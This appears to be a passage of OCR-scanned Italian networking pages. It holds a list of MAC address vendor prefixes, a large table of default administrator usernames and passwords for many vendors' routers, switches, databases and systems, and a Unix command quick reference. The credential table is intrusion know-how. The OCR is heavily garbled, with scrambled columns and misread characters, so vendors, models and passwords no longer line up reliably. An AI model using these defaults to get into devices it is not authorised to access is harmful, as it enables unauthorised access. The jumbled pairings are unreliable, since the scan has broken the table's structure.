00C07B bridges/routers 

00C07D RISC Developments Ltd 

00C07F Nupon Computing Corp 

00C080 Netstar Ine 

00C081 Metrodata Ltd 

00C082 Moore Products Co 



00C084 Data Link Corp Ltd 

00C085 Canon 

00C086 The Lynk Corporation 

00C087 UUNET Technologies Ine 

00C089 Telindus Distribution 

00C08A Lauterbach Datentechnik Gmbh 

00C08B RISQ Modular Systems Ine 

00C08C Performance Technologies Ine 

00C08D Tronix Product Development 

00C08E Network Information Technology 

00C08F Matsushita Electric Works, Ltd. 

00C090 Praim S.R.L. 

00C091 Jabil Circuit, Inc. 

00C092 Mennen Medicai Ine 

00C093 Alta Research Corp. 

Znyx (Network Appliance box); Jupiter 

00C095 Systems (MX-700 series) 

00C096 Tamura Corporation 

00C097 Archipel SA 

00C098 Chuntex Electronic Co., Ltd. 

00C09B Reliance Comm/Tec, R-Tec Systems Ine 

00C09C TOA Electronic Ltd 

00C09D Distributed Systems Int'l, Inc. 

00C09F Quanta Computer Ine 

00C0A0 Advance Micro Research, Inc. 

00C0A1 Tokyo Denshi Sekei Co 

00C0A2 Intermedium A/S 

00C0A3 Dual Enterprises Corporation 

00C0A4 UnigrafOY 

00C0A7 SEELLtd 

00C0A8 GVC Corporation 

00C0A9 Barron McCann Ltd 

00C0AA Silicon Valley Computer 

00C0AB Jupiter Technology Ine 

00C0AC Gambit Computer Communications 

00C0AD Computer Communication Systems 

00C0AE Towercom Co Ine DBA PC House 

00C0B0 GCC Technologiesjnc. 

00C0B2 Norand Corporation 

00C0B3 Comstat Datacomm Corporation 

00C0B4 Myson Technology Ine 

00C0B5 Corporate Network Systems Ine 

00C0B6 Meridian Data Ine 

00C0B7 American Power Conversion Corp 

00C0B8 Fraser's Hill Ltd. 

00C0B9 Funk Software Ine 

00C0BA Netvantage 

00C0BB Forval Creative Ine 

00C0BD Inex Technologies, Inc. 

00C0BE Alcatel -Sei 

00C0BF Technology Concepts Ltd 
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00C0C0 Shore Microsystems Ine 
00C0C1 Quad/Graphics Ine 
00C0C2 Infinite Networks Ltd. 
00C0C3 Acuson Computed Sonography 
00C0C4 Computer Operational 
00C0C5 SID Informatica 
00C0C6 Personal Media Corp 
00C0C8 Micro Byte Pty Ltd 
00C0C9 Bailey Controls Co 
00C0CA Alfa, Inc. 

00C0CB Control Technology Corporation 

00C0CD ComeltaS.A. 

00C0D0 Ratoc System Ine 

Comtree Technology Corporation (EFA 
00C0D1 also reported) 

00C0D2 Syntellect Ine 

00C0D4 Axon Networks Ine 

00C0D5 Quancom Electronic Gmbh 

00C0D6 J1 Systems, Inc. 

Quinte Network Confidentiality Equipment 
00C0D9 Ine 

00C0DB IPC Corporation (Pte) Ltd 

00C0DC EOS Technologies, Inc. 

00C0DE ZComm Ine 

00C0DF Kye Systems Corp 

00C0E1 Sonic Solutions 

00C0E2 Calcomp, Inc. 

00C0E3 Ositech Communications Ine 

00C0E4 Landis & Gyr Powers Ine 

00C0E5 GESPACS.A. 

00C0E6 TXPORT 

00C0E7 FiberdataAB 

00C0E8 Plexcom Ine 

00C0E9 Oak Solutions Ltd 

00C0EA Array Technology Ltd. 

00C0EC Dauphin Technology 

00C0ED US Army Electronic Proving Ground 

00C0EE Kyocera Corporation 

00C0EF Abit Corporation 

00C0F0 Kingston Technology Corporation 

00C0F1 Shinko Electric Co Ltd 

00C0F2 Transition Engineering Ine 

00C0F3 Network Communications Corp 

00C0F4 Interlink System Co., Ltd. 

00C0F5 Metacomp Ine 

00C0F6 Celan Technology Inc. 

00C0F7 Engagé Communication, Inc. 

00C0F8 About Computing Inc. 

00C0FA Canary Communications Ine 

00C0FB Advanced Technology Labs 

00C0FC ASDG Incorporated 



00C0FD Prosum 

00C0FF Box Hill Systems Corporation 

00DD00 Ungermann-Bass IBM RT 

00DD01 Ungermann-Bass 

00DD08 Ungermann-Bass 

00E011 Uniden Corporation 

00E014 Cisco Ethernet switch 

00E01 6 rapid-city (now a part of bay networks) 

00E01 E Cisco Lightstream 1010 

00E029 SMC EtherPower II 10/100 

AST - built into 5166M PC motherboard 

00E02C (win95 id's as Intel) 

00E034 Cisco 

00E039 Paradyne 71 1 2 T1 DSU/CSU 

00E04F Cisco 

00E083 Jato Technologies, Inc. 

00E08F Cisco Systems Catalyst 2900 

00E098 Linksys PCMCIA card 

00E0A3 Cisco 

00E0B0 Cisco Systems Catalyst 2900/5000 

00E0B8 AMD PCNet in a Gateway 2000 

00E0C5 BCOM Electronics Inc. 

00E0F7 Cisco 

00E0F9 Cisco 

00E0FE Cisco 

020406 BBN internai usage (not registered) 

Interlan [now Racal-InterLAN] DEC 

020701 (UNIBUS or QBUS), Apollo, Cisco 

020701 Racal-Datacom 

026060 3Com 

026086 Satelcom MegaPac (UK) 

3Com IBM PC; Imagen; Valid; Cisco; 

02608C Macintosh 

02AA3C Olivetti 

CMC Masscomp; Silicon Graphics; Prime 

02CF1F EXL 

Prominet Corporation Gigabit Ethernet 

02E03B Switch 

02E6D3 BTI (Bus-Tech, Inc.) IBM Mainframes 

080001 Computer Vision 

080002 3Com (formerly Bridge) 

ACC (Advanced Computer 

080003 Communications) 

080005 Symbolics Symbolics LISP machines 

080006 Siemens Nixdorf PC clone 

080007 Apple 

080008 BBN (Bolt Beranek and Newman, Inc.) 

080009 Hewlett-Packard 
08000A Nestar Systems 
08000B Unisys 

08000D ICL (International Computers, Ltd.) 

08000E NCR/AT&T 
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08000F SMC (Standard Microsystems Corp.) 

08001 0 AT&T [misrepresentation of 80001 0?] 

08001 1 Tektronix, Inc. 

Excelan BBN Butterfly, Masscomp, Silicon 

080014 Graphics 

National Semiconductor Corp. (used to 

080017 have Network System Corp., wrong NSC) 

08001 A Tiara? (used to have Data General) 

08001 B Data General 

08001 E Apollo 

08001 F Sharp 

080020 Sun 

080022 NBI (Nothing But Initials) 

080023 Matsushita Denso 

080025 CDC 

080026 Norsk Data (Nord) 

080027 PCS Computer Systems GmbH 

080028 TI Explorer 
08002B DEC 
08002E Metaphor 

08002F Prime Computer Prime 50-Series LHC300 

080030 CERN 

080032 Tigan 

080036 Intergraph CAE stations 

080037 Fuji Xerox 

080038 Bull 

080039 Spider Systems 
08003B Torus Systems 
08003D cadnetix 

08003E Motorola VME bus processor modules 

080041 DCA (Digital Comm. Assoc.) 

080044 DSI (DAVID Systems, Inc.) 

???? (maybe Xylogics, but they claim not 

080045 to know this number) 

080046 Sony 

080047 Sequent 

080048 Eurotherm Gauging Systems 

080049 Univation 

08004C Encore 

BICC [3com bought BICC, so may appear 

08004E on 3com equipment as well] 

080051 Experdata 

080056 Stanford University 

080057 Evans & Sutherland (?) 

080058 ??? DECsystem-20 
08005A IBM 

080066 AGFA printers, phototypesetters etc. 

080067 Comdesign 

080068 Ridge 

080069 Silicon Graphics 
08006A ATTst (?) 
08006E Excelan 



080070 Mitsubishi 

080074 Casio 

080075 DDE (Danish Data Elektronik A/S) 
080077 TSL (now Retix) 

080079 Silicon Graphics 
08007C Vitalink TransLAN III 

080080 XIOS 

080081 Crosfield Electronics 
080083 Seiko Denshi 

080086 Imagen/QMS 

080087 Xyplex terminal servers 

080088 McDATA Corporation 

080089 Kinetics AppleTalk-Ethernet interface 
08008B Pyramid 

08008D XyVision XyVision machines 

08008E Tandem / Solbourne Computer ? 

08008F Chipcom Corp. 

080090 Retix, Inc. Bridges 
09006A AT&T 

10005A IBM 

1 00090 Hewlett-Packard Advisor produets 

1000D4 DEC 

Apple A/UX (modified addresses for 
1000E0 licensing) 

LAA (Locally Administered Address) for 
2E2E2E Meditech Systems 

3Com dual function (V.34 modem + 
3C0000 Ethernet) card 

400003 Net Ware (?) 

444553 Microsoft (Windows95 internai "adapters") 

444649 DFI (Diamond Flower Industries) 

GTC (Not registered!) (This number is a 
475443 multicast!) 

484453 HDS ??? 

484C00 Network Solutions 

4854E8 winbond? 

Information Modes software modified 
4C424C addresses (not registered?) 

52544C Novell 2000 

REALTEK (a Realtek 8029 based PCI 
5254AB Card) 

565857 Aculab pie audio bridges 

AT&T [misrepresented as 080010? One 
80001 0 source claims this is correct] 

CNET Technology Inc. (Probably an error, 
80AD00 see instead 0080AD) 

AA0000 DEC obsolete 

AA0001 DEC obsolete 

AA0002 DEC obsolete 

DEC Global physical address for some 
AA0003 DEC machines 

DEC Locai logicai address for DECNET 
AA0004 systems 

C00000 Western Diaitai (mav be reversed 00 00 
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CO?) 

EC1000 Enance Source Co., Ltd. PC clones(?) 
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Le passwords di def aults 

Queste che seguono sono alcune password di default. 



3Com 
3Com 
3Com 
3Com 
3Com 
3Com 
3Com 

3com 

3Com 
3Com 
3Com 
3Com 
3Com 
3Com 
3Com 
3Com 
3Com 
3Com 
3Com 
3com 
3com 
3com 
3Com 
3Com 

3com 

3Com 

3Com 

3com 
3Com 
3Com 
3com 
3Com 

3Com 

3COM 
3com 

3com 

3com 

3Com 

3Com 
3Com 
ACC 



Super Stack 2 Switch 

AccessBuilder® 7000 BRI 

CoreBuilder 2500 

Switch 3000/3300 

Switch 3000/3300 

Switch 3000/3300 

Cable Managment System 
SQL Database (DOSCIC 
DHCP) 

NAC (Network Access Card) 

HiPer ARC Card 

CoreBuilder 6000 

CoreBuilder 7000 

SuperStack II Switch 2200 

SuperStack II Switch 2700 

SuperStack / CoreBuilder 

SuperStack / CoreBuilder 

SuperStack / CoreBuilder 

LinkSwitch and CellPlex 

LinkSwitch and CellPlex 

Superstack II 3300FX 

Switch 3000/3300 

3comCellPlex7000 

Switch 3000/3300 

AirConnect Access Point 

Superstack II Dual Speed 
500 

OfficeConnect 5x1 

SuperStack 3 Switch 
3300XM 

Super Stack 2 Switch 
SuperStack II Switch 1100 
SuperStack II Switch 1100 
super stack 2 switch 
Office Connect Remote 812 

Switch 3000/3300 

OCR-812 



1.25 

Any 

Any 



root 
manager 



manager 

admin 

security 



v4.1.x of HA 



n/a 



at least 5.x 



Any 



any 



debug 

tech 

debug 

tech 

admin 

read 

write 

tech 

debug 

admin 

Admin 

tech 

monitor 

security 

admin 

manager 

manager 

security 

manager 

root 

admin 

root 



letmein 
manager 



manager 

admin 

security 



Win2000 £ MS DOCSIS_APP 3com 



NBX100 

Home Connect 

OfficeConnect 5x1 



2.8 



at least 5.x 



administrato 
r 

User 

estheralastr 



none 

none 

tech 

tech 

synnet 

tech 



tech 
synnet 

3com 
tech 
monitor 
comcomcom 

security 

PASSWORD 



manager 
manager 
security 
manager 
Iroot 
admin 

Iroot 
0000 

Password 



SuperStack II Switch 3300 - 
Superstack - 
Routers - 



uey 

manager 



netman 



manager 



netman 
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Acc/Newbri dge 
Acc/Newbridge 
adaptec 

Adaptec RAID 

adtran 

Adtran 

Adtran 

Aironet 

alcatel 

Alcatel 

alcatel 

Alcatel /Net/bridge/ 
Timestep 

Alcatel /Newbrldge/ 
Timestep 

Al cat el /Newbrldge/ 
Timestep 

Allied Tenysin 

Alteon 

Alteon Web Systems 

APC 

APC 

Apple 

Apple 

Arrowpoint 

Ascend 

Ascend 

Ascom 

AT&T 

AWARD 

Axent 

Axis 
AXIS 
AXIS 
Axis 
bay 
bay 
Bay 

Bay / Nortel 

Bay Network 
Routers 

Bay Networks 

Bay Networks 

Bay /Nortel 
Networks 

Bay /Nortel 
Networks 

BEA 

BEA 

bewan 



Congo /Amazon/Tigris 
Congo/ Amazon/Tigris 

Storage Manager Pro 

tsu 600 ethernet module 
TSU 120 e 
TSU 120 e 
Ali 

1000 ANT 

speed touch home 

VPN Gateway 
1 5xx/ 4 5xx/ 7 xxx 

VPN Gateway 15xx/ 

VPN Gateway 15xx/ 
R130 

ACEswitch 180e (telnet) 
Ali hardware releases 
MasterSwitches 
Any 

Network Assistant 

Airport 

any? 

Ali TAOS model s 
Pipeline Terminal Server 
Timeplex Routers 
Starlan SmartHUB 
Any BIOS 

NetProwler manager 
NPS 530 

StorPoint CD100 
200 VI. 32 

2100 Network Camera 
CV1001003 



ARN 
Ali 

ASN / ARN Routers 
Baystack 

Accelar lxxx switches 

Remote Annex 2000 
Weblogic 



Ali versions netman 
Ali versions netman 



Ali 



Administrato 
r 

18364 



netman 
netman 

adaptec 

ADTRAN 
ADTRAN 



Win 98 



Any 



Any 



Any 



root 



root 



root 



- Manager 

- admin 
Web OS 5.2 none 

- ape 
Firmware Pri apeuser 



3.X 
1.1 

ali 

Any 
9.9 

WinNT 



None 

none 

admin 

admin 

answer 

See notes 

N/A 

AWARD_SW 
administrato 



5.02 root 

4.28 root 

— admin 

Linux (ETRAX root 



permit 
permit 

permit 

friend 

blank 

admin 

ape 

ape 

xyzzy 

public 

system 

Ascend 



manager 

admin 

pass 
pass 

pass 



13.20 



Any 

Any 

Any 

5.1 



Manager 
(caps count 
!) 

User 
Manager 



admin 
system 



Manager 
Net ICs 

rwa 

IP address 
weblogic 
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Bintec 

Bintec 

Biodata 

Biodata 

Borland 

Borland 

Borland/Inprise 
BreezeCom 

BreezeCOM 

BreezeCOM 

BreezeCOM 

Brocade 

Buffalo/MELCO 

Cabletron 

Cabletron 

Cabletron routers 
and switches 

Cayman 

celerity 



ali Routers 

BIGfire £ BIGfire+ 

ali Babylon-Boxes 

interbase 

Interbase 

Interbase 

APIO, SAIO 

Station Adapter and 
Access Point 

Station Adapter and 
Access Point 

Silkworm 

AirStation WLA-L11 
any 

NB Series 



3220-H DSL Router 



Any 

ali 
ali 



admin 



bintec 

biodata 
Babylon 



Any politcally correct 

any SYSDBA masterkey 

BreezeNET PR - - 



4.x 
3.x 
2.x 



admin 



Super 
Master 
laflaf 
password 



root (cannot (no password 
be changed) by de fault) 



any — 

Any — 

* blank 

GatorSurf 5. Any 



inuvik49 
blank 



Chase Research 


Iolan+ 






iolan 




Any Router and Switch 


10 thru 12 






Cisco 


ConfigMaker Software 


any? 


n/a 


cmaker 


CISCO 


JUCL ttUX A AG Lidi 


3. 0 


ADMIN 


fiha rifranto 


CISCO 


N/A 


N/A 


pixadmin 


pixadmin 


Cisco 


routers 


Not sure. . . 


j ~ 


san-fran 


Cisco 


VPN 3000 Concentrator 




admin 


admin 


Cisco 


Net Ranger 2.2.1 


Sol 5 . 6 


root 


attack 


cisco 


1600 


12.05 






cisco 


1601 








cisco 










cisco 










Cisco 


MGX 


* 


superuser 


superusei 


cisco 


1601 








cisco 










Cisco 










cisco 










Cisco 




aany IOS 


no default 


no defauj 


any 


log in 


password 


CISCO 


arrowpoint 








cisco 










cisco 










cisco 










Cisco 


2503 








Cisco 










cisco 










Cisco 


IDS (netranger) 




root 


attack 


cisco 










cisco 


1600 








CMOS BIOS 








ESSEX or 


Cobalt 


RaQ * Qube* 


Any 


admin 


admin 
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Com21 



Comersus Shopping 
Cart 

Compaq 

Compaq 

Compaq 

Compaq 

copper mountain 
Coppercom 

Coyote-Point 
Coyote-Point 
Coyote-Point 

Coyote-Point 

Cyclades 

D-Link 

D-Link 

Dell 

Dell 

Dell 

dell 

Digiboard 

DLink 

Dlink 

DLink 

Dlink 
dlink 

DLink 

Dupont Digital 
Water Proofer 

eci 

Efficient 

Elron 

emai 

Ericsson 

Ericsson (formerly 
ACC) 

Extended Systems 

Extended Systems 

Ext reme 

extreme 

Ext reme 

Flowpoint 

FlowPoint 



3.2 

Insight Manager 
Insight Manager 
Management Agents 



Win 95/98/NT admin dmr99 

Administrato administrato 



Ali 



operator operator 

administrato 
r 



none 



Equaliser 4 
Equaliser 4 
Equaliser 4 

Equaliser 4 

MP/RT 

DI-704 

DI-701 

PowerVault 50F 
PowerVault 35F 
Powerapp Web 100 Linux 

Portserver 8 & 16 

DI-206 ISDN router 

Dl-106 ISDN router 

DL-101 Cable /DSL 
Gateway/Firewall 

DFE-538TX 10/100 Adapter 

di! 04 

DI 106 
Sun Sparc 



Firewall 

hotmail 
ACC 

Any router 

ExtendNet 4000 / Firewall 

Print Servers 

Ali Summits 

black diamond 

Ali 

144, 2200 DSL Routers 
144, 2200 DSL Routers 



Free BSD 



Free BSD 



Free BSD 



Free BSD 



eqadmin — 

Serial port equalizer 
only 

root - 

Serial port - 
only 

look - Web 
Browser only look 
(Read a 

touch - Web 
Browser only touch 
(Write 



- super 
2.22 (?) 

WindRiver (E root 

- root 
RedHat 6.2 root 



any 
1. * 



Windows 98 



winnt 
any 

2.5c 

ali 



surt 
admin 

calvin 
calvin 
powerapp 

dbps 

Admin 

1234 

year2000 



- admin 

administrato @*nigU*D.ha, 
r 



root 
Admin 



root 



hostname/ ip 
address 

netman 
netman 



ali Versions admin 

- admin 

- admin 



Ali 
ALL 
ALL 



Admin 



parOt 



sysadmin 

netman 

netman 

admin 
extendnet 



password 
admin 
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Flowpoint 
Flowpoint 
fore 

Fore Systems 
Foundry Networks 
fujitsu 

Future Networks 

gatway 

General 
Instruments 



2200 
2200 

ASX 1000/1200 6.x 

ServerlronXL Any 
1460 

FN HOC Docsis cablemodem Any 

solo9100 win95 

SB2100D Cable Modem 



Serial Num 
Serial Num 



test 



test 



gonet 














fast 


abd234 


Hewlett Packard 


HP Jetdirect 


(Ali Models) 


Any 


none 


none 


Hewlett Packard 


MPE-XL 












HELLO 


MANAGER. Sì 


Hewlett Packard 


MPE-XL 












HELLO 


MGR . SYS 


Hewlett Packard 


MPE-XL 










_ 


HELLO 


FIELD.SUP1 
T 


Hewlett Packard 


MPE-XL 












MGR 


CAROLIAN 


Hewlett Packard 


MPE-XL 












MGR 


CCC 


Hewlett Packard 


MPE-XL 












OPERATOR 


COGNOS 


Hewlett Packard 


MPE-XL 












MANAGER 


HPOFFICE 


ho 


4150 
















ho 


















IBM 


AS/400 












qsecofr 


qsecofr 


IBM 


AS/400 












qsysopr 


qsysopr 


IBM 


AS/400 












qpgitir 


qpgmr 


IBM 


NetCommerce PRO 






3.2 


ncadmin 


ncadmin 


IBM 


LAN Server / OS/2 




2.1, 3.0, 4. 


username 


password 


IBM 


2210 










RIP 


def 


trade 


IBM 


DB2 










WinNT 


db2admin 


db2admin 


IBM 


Lotus Domino Go WebServer 
(net . commerce edition) 


ANY ? 


webadmin 


webibm 


IBM 


AS400 










Any 


QSECOFR 


QSECOFR 


IBM 


RS/6000 










AIX 


root 


ibm 


IBM 












OS/400 


QSECOFR 


QSECOFR 


IBM 


AS400 










— 


QSRVBAS 


QSRVBAS 


IBM 


AS400 












QSRV 


QSRV 


ibm 


as400 










— 


— 


— 


IBM 


AS/400 










OS/400 


QUSER 


QUSER 


IBM 


AS/400 
















IBM 


ra6000 










AIX Unix 






IBM 


AIX 
















Imperia Software 


Imperia Content 
System 


Managment 


Unix/NT 


superuser 


superuser 


Intel 


510T 










Any 




admin 


Intel 


AH Routers 








AH Versions 




babbi t 


Intel 


AH Routers 








AH Versions 




babbit 


Intel 


Intel PRO/Wireless . 
Wireless LAN Access 


2011 
Point 


Any 




Intel 


Intel 


wireless 


lan 


access 


Point 






comcomcom 


Ipswitch 


Whats up 


Gold 6. 


. 0 




Windows 9x a 


admin 


admin 


janta sales 


254 










Compaq 


janta sales 


janta211 


janta sales 


254 










Compaq 


janta sales 


janta211 


Jetform 


Jetform_design 








Jetform 
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Kawa 

LANCAST 

Lantronix 

Lantronix 

Lantronix 

Lantronix 

LGIC 

Linkou School 

Linkou School 

Linksys 

Linksys 

linksys 

Linksys 

Livingston 

Livingston 

Lucent 

Lucent 

lucent 

Lucent 

Lucent 

lucent 

lucent 

macromedi a 

MacSense 

mcafee 

microcom 

Micron 

Microrouter 
(Cisco) 

Microrouter 
(Cisco) 

Microsoft 

Microsoft 

Microsoft 

Microsoft 

Microsoft 

Microsoft 

MICROSOFT 

Microsoft 

MICROSOFT 

Microsoft 

microsoft 

Microsoft 

microsoft 

mICROSOFT 

Microsoft 

Microsoft 

Motorola 

Motorola 

motorola 



LPS1-T Print Server 
MSS100, MSSVIA, UDS10 
LSB4 

Printer and 
terminalservers 

Goldstream 



Cable/DSL router 
BEFSR7(1) OR (4) 



jll-16 
Any 
any 

2.5.1 



any 
any 

LR-ISDN 
bill 
bill 
Any - 
Standalone R blank 



BEFSR41 

Livingston _portmaster2 / 3 - 
Livingston off icerouter - 
Portmaster 2 - 
Cajun Family - 
Portmaster 3 unknown 
Packetstar (PSAX) 
AP-1000 
dsl 

freehand 9 
X-Router Pro - 



hdms 

Any 
Any 

Windows NT 

Windows NT 
Windows NT 
SQL Server 
Windows NT 
NT 
NT 

Windows NT 
NT 



Ms proxy 2 . 0 



Key Managment Server 

Motorola-Cablerouter 
Motorola-Cablerouter 
cyber surfer 



unknowen 
bios 

Any 
Any 

Ali 

Ali 
Ali 

4.0 

4.0 
4.0 
4.0 



(blank) 

Iroot 

ìroot 

!root 
root 

ìroot 

readwrite 

public 



admin 



system 



system 
system 
system 

system 

LR-ISDN 

bill 

bill 

admin 

admin 

admin 

blank 

blank 

none 

root 

! ishtar 

lucenttechl 

public 



admin 



hdms 



- letmein 

- letmein 

Administrato _ 
r 

Guest 
Mail 

sa - 

pkoolt pkooltPS 

- start 
free user user 
admin admin 
free user user 



Windows NT 4 



cablecom 
cablecom 



password 

router 
router 
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msdloto 

msdloto 

Multi-Tech 

Nanoteq 

NetApp 

Netgaer 

Netgear 

Netgear 

Netgear 

Netgear 

Netgear 

Netgear 

netgear 

netlink 

Netopia 

Netopia 

Netscreen 

NeXT 

Nokia - Telecom NZ 
Nortel 

Nortel 
Nortel 
Nortel 

Nortel Networks 
(Bay) 

Northern 
Telecom (Nortel) 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

Novell 

novell 
ODS 

Optivision 
Oracle 

Oracle 

Oracle 
Oracle 



msdloto 

RASExpress Server 

NetSeq firewall 

NetCache 

RH328 

RH348 

ISDN-Router RH348 

RT311 

RT314 

RT338 

RT311/RT314 

rt314 
R1100 
455 

NS-5, NS10, NS-100 
MIO 

Meridian 1 PBX 

Contivity Extranet 
Switches 

Norstar Modular ICS 
Norstar Modular ICS 
Instant Internet 

Meridian 1 

NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 
NetWare 

NetWare 



1094 IS Chassis 
Nac 3000 & 4000 

8i 

Internet Directory 
Service 

7 or later 

7 or later 



5.30a 



any 



Any 
Any 



guest 
admin 
admin 



Admin 
Admin 



admin 



4.6.2 admin 
v3.1 

2.0 netscreen 
NeXTStep 3.3 me 
- Telecom 
OS Release 2 0000 



2.x 
Any 
Any 
Any 



Any 
any 
Any 
Any 
Any 
Any 
Any 
Any 
Any 
Any 
Any 
Any 

Arcserve 
Any 

4.x 
any 

8.1.6 
any 



admin 

** ADMIN 
(**23646) 

**CONFIG 
(266344) 



none 

NetSeq 

NetCache 

1234 

1234 

1234 

1234 

1234 

1234 

1234 



admin 



netscreen 



Telecom 
0000 

setup 

ADMIN 
(23646) 

CONFIG 
(266344) 



— mllink 

guest - 

PRINT 

LASER 

HPLASER 

PRINTER 

LASERWRITER - 

POST 

MAIL 

GATEWAY 

GATE 

ROUTER 

BACKUP 

CHEY_ARCHSVR WONDERLAND 

WINDOWS_PASS 
THRU 



ods 
root 



ods 

mpegvideo 

change on in 
stali 



sys 

cn=orcladmin welcome 



system 
sys 



manager 
chancte on in 
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Oracle 
Oracle 
or ade 
or ade 

oracle co. 

Osicom (Datacom) 
Pandatel 

PlainTree 

RapidStream 

realtek 

Remedy 

Research Machines 

Rodopi 

ROLM 

Samba 

schoolgirl 
Securi cor3NET 
Securi cor3NET 
SGI 

SGI 

SGI 

SGI 

SGI 

Shiva 

Shiva 

Shiva 

SMC 

soho 

Solaris 

sonic wall 

SonicWall 

SpeedStream 

Spider Systems 

Sprint PCS 

Ssangyoung 

Sun 

Sun 

surecom 
Symnatec 

SysKonnect 

SysKonnect 

Tekelec 
Telebit 



7 or later 
8i 



Database engines 

Osicom (Datacom) 
EMUX 

Waveswitch 100 

RS4000-RS8000 

8139 

Any 

Classroom Assistant 

Rodopi billing software 
' AbacBill ' sql database 

phones/phone mail 

SWAT Package 

member 
Monet 
Ce z zanne 
ali 



Any 
ali 



every 



ali 



Linux 



Any 

Windows 95 



Linux 



Scott 
internai 



sys 

sysadm 
admin 



rsadmin 

Demo 
manager 

rodopi 



any 
any 
ali 



Embedded Support Partner IRIX 6.5.6 
IRIX ALL 



Any Locai 
User 

ich 

manager 

manager 

root 

Administrato 
r 



stali 
Tiger 
oracle 



change on in 
stali 

sysadm 

admin 

default .pass 
word 

rsadmin 



changeme 

rodopi 

111# 

Locai User 
password 

hci 

friend 
friend 
n/a 

Partner 



IRIX 

IRIX 
LanRover 
AccessPort 
Any? 

Barricade 
nbgSOO 

any firewall device 
Any Firewall Device 

M250 / M250L 

SCH2000 

SR2501 

ep3501/3506 

6616 
6616 

Eagle STP 
netblazer 3. * 



ALL 

ALL 

any? 

Any 

unknown 
admin 



IP 

OutOfBox, 
demos, 
guest, 
4DGifts 

EZsetup 

root 

hello 

Guest 



admin 

password 
admin 



IP 

(none by 
default) 



hello 
blank 
admin 
1234 



password 



hello 



see notes 



Menu -8-0 
(see notes) 



040793 



SunOS 4.1.4 root 
Solaris - 
own os admin 



2501 



surecom 



default .pass 
word 

default .pass 
word 

eagle 

setup/snmp 



eagle 

setuv/nooass 
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Terayon 

Terayon 

Terayon 

Terayon 

terayon 

Terrayon 

Titbas 

TopLayer 

Toshiba 

toshiba 

toshiba 

TrendMicro 

Trintech 

Ullu ka pattila 
USR 

Vina Technologies 
voy 

WatchGuard 

Webmin 

Webramp 

Win2000 

Windows 98 se 

Wireless Inc. 

Xylan 

Xylan 

Xylan 

xyplex 

Zyxel 

zyxel 

Zyxel 

Zyxel 
Zyxel 
ZYXEL 
Zyxel 
Zyxel 
Zyxel 
zyxel 



TeraLink Getaway — 

TeraLink 1000 Controller - 

TeraLink 1000 Controller - 

TeraLink Getaway — 



AppSwitch 2500 

TR-650 

480cdt 

ISVW (VirusWall) 

eAcquirer App/Data 
Servers 

Gand mara 

TOTALswitch 

ConnectReach 

FireBox 



6.29 

SCO 
Any 

V2. 01 . 00 



any 

Gandoo 
Any 

3. 6.2 

3-4.6 



admin 

admin 

user 

user 

admin 

haasadm 

siteadmin 

admin 



admin 

t3admin 

Bhosda 
none 
(none) 



Webmin 
410i etc. . . 

Quick Time 4.0 Englisch 
98 se 

WaveNet 2458 n/a 

Omnistack 1032CF 3.2.8 

Omnistack 4024 3.4.9 

Omniswitch 3.1.8 

mx-1 6xx - 
ISDN-Router Prestige 1000 - 



Any Unix/Lin admin 
- wradmin 



root 

admin 

admin 

admin 

setpriv 



prestige 300 series 

ISDN Router Prestige 
100IH 



zynos 2 . * 



prestige 300 series any 

prestige 600 series any 
641 ADSL 

prestige 128 modem-router any 

ISDN-Router Prestige 1000 - 

ISDN-Router Prestige 1000 - 



wd 

password 
password 
password 
password 
nms 

lucy99 

toplayer 

tr650 



admin 

Trintech 

Lund 
amber 
(none) 



wg (touch 
password) 



trancell 



rootpass 

password 

password 

switch 

system 

1234 

1234 



1234 



1234 
1234 



UNIX Quick Referencs 



Connect : 



telnet [host] 

21 (FTP), 20 (FTP data) ) 

ssh [host ] 

rlogin -1 [username] 

. rhost (host username) ) 

ftp -i 

when using mget) , hash (status) ) 
ftptool 



Connect to host (25 (SMTP), 109/110 (P0P3) , 
Secure telnet to host 

Connect to host (no passwd necessary if in 
File transfer with host (—i (don't promt 
X—window based FTP prgram 
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xhost +/- hostname 

machine (setenv DISPLAY locmach: 

talk [username@host ] 

write [username] 

the same machine 

mesg -yes / -no 

logout, bye 

passwd, yppasswd , chfn, chsh 
slirp 

"asyncmap FFFFFFFF" "mtu 1500" 
(save encrypted passwd in file 
pppd 

locIP:remIP asyncmap FFFFFFFF 

aspppd 
needed 
httpd 

srm . conf, access . conf) 

exit 

quit 



Allow host to open X—Window on locai 
0.0) 

Talk to username 

Write directly to username, you must be on 

Enable or disable receiving of messages 
Disconnect from host 

Change locai or NIS password Information 
Slirp (conf: . slirprc) (options : -P -b 9600 

"mru 1500" compress ppp-exit debug papcrypt 

~/ . pap-secrets ) ) 

PPP (use chat -v to connect) (options: 9600 
crtscts mru 1500) 

To automatically build a ppp-connection if 

HTTP-Server (confiles: httpd. conf, 

Log out from ssh, telnet, rlogin 
Log out from ftp 



File transfer and Mail : 
mailx 

mailx -s [subject] [user] 
x (quit without changing) , 

mails) ) 
telnet host 25 

address) , rcpt to: (ree address) , 

telnet host 110 (or 109) 
uidl (listmails) , retr [n] 

message n) , quit) 

get 

mget 

wild char) 
put 



Read mails 

Send mail to user ("." (finish) q (quit), 

n (next) , d (delete) , r (reply) , h (display 

SMTP (helo (authorize) , mail from: (snd 

data (mail body) , "." (finish) ) 

P0P3 (user [username] , pass [password] , 

(retrive message n) , dele [n] (delete 

Get file from ftp-host 

Get multiple files from ftp-host (can use 
Copy file to ftp-host 



Connect info : 



who 
w 

like processes and load 

finger [-1 @host ] 

finger [user] 

whois [—h host name ] 

rusers 

connected users 

who ami 

id 

last —n [num] 

by user or terminal 



Who is connected 

Similar to who just displays more info, 

Display info about logged on users 

Display info about user 

Scans for a name or handle 

Scans the whole remote network for 

Display the effective current username 
List user & group ids 

List the num last users who have logged in, 



Network : 



nslookup 
route 

netstat —nr 
ifconfig [device] 
devices : —a 

ifconfig loO:l 10.0.2.20 121.0.0.1 up 
import ant ! ) 

Put this at the end of the file: 

/etc/init . d/sysid. net 

traceroute [hostname] Tracing IP packet from this host to 

hostname 



Query domain name servers interactively 
Routing (add host/net target gateway 0) 
Routing table. Show network status 
Show the stats of network device, or ali 

Enables a previously added route (very 



Jobs : 
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jobs 
ps 

$USER) 
CTRL + Z 

kill [pld] / CTRL + C 

immediately) 

bg 

calling fg 
fg [num] 

COTCtTCl & 

nohup comm S 
terminal is down 
CTRL + U 
CTRL + S 
